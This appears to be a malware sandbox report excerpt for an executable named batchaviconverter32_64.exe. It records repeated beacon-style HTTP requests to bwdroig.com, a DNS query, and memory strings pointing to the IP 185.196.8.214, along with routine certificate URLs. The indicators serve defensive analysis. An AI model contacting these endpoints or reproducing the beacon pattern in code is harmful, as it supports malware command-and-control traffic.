        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficDNS traffic detected: DNS query: bwdroig.com
        Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.000000000080C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.214/
        Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.000000000080C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.214/sea
        Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, batchaviconverter32_64.exe, 00000003.00000002.3334036790.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.214/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
        Source: is-7PIOL.tmp.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
        Source: is-7PIOL.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
        Source: is-7PIOL.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
        Source: is-7PIOL.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
        Source: is-7PIOL.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
        Source: is-7PIOL.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
        Source: is-7PIOL.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
        Source: is-7PIOL.tmp.1.drString found in binary or memory: http://ocsp.comodoca.com0
        Source: is-7PIOL.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://ocsp.thawte.com0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://s.symcd.com06
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://subca.ocsp-certum.com01
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
